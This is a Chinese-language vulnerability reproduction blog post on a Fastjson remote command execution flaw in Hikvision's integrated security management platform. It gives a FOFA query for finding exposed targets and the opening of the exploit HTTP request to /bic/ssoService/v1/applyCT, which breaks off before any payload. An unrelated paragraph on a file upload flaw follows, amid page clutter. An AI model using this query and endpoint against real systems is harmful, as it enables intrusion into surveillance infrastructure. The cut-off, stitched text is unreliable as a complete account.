【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现


前言

​海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。


声明

本篇文章仅用于漏洞复现与技术研究,切勿将文中涉及攻击手法用于非授权下渗透攻击行为,造成任何后果与本文及作者无关,切记!!!

一、海康威视综合安防管理平台简介

综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。

二、漏洞描述

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。


三、影响版本

未知

四、漏洞复现

FOFA: app=“HIKVISION-综合安防管理平台”
在这里插入图片描述
漏洞数据包如下:

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firef
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
海康威视iSecure Center综合安防管理平台曾存在任意文件上传漏洞。该漏洞允许攻击者通过在应用程序中上传恶意文件来执行任意代码或获取系统权限。这种漏洞可能导致非授权访问、信息泄露、拒绝服务攻击等安全风险。 任意文件上传漏洞通常出现在没有适当的身份验证和文件类型验证的应用程序中。攻击者可以通过构造恶意请求,上传包含恶意脚本或恶意软件的文件,从而执行恶意代码或操作系统命令。 为了防止此类漏洞的发生,海康威视应采取以下措施来加强安全性: 1. 进行有效的输入验证和过滤:实施适当的输入验证,对用户输入进行有效检测和过滤,以防止恶意文件或代码的上传。 2. 限制上传文件类型和大小:对文件上传功能进行严格限制,白名单验证只允许上传特定的文件类型,同时限制文件大小。 3. 实施安全审计和监控:监控平台中的文件上传活动,及时发现和阻止恶意行为,同时记录日志以便进行安全审计和调查。 4. 及时更新和修复漏洞:对已知的漏洞进行及时修复和更新,及早应用安全补丁以确保系统的安全性。 5. 提供安全培训和意识教育:向开发人员和系统管理员提供安全培训,提高其对安全漏洞和攻击的认识,增强安全意识。 通过采取上述措施,海康威视iSecure Center综合安防管理平台可以有效地防止任意文件上传漏洞的利用,提高系统的安全性和可靠性。同时,及时修复和更新系统中已知的漏洞,以减少安全风险对系统的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值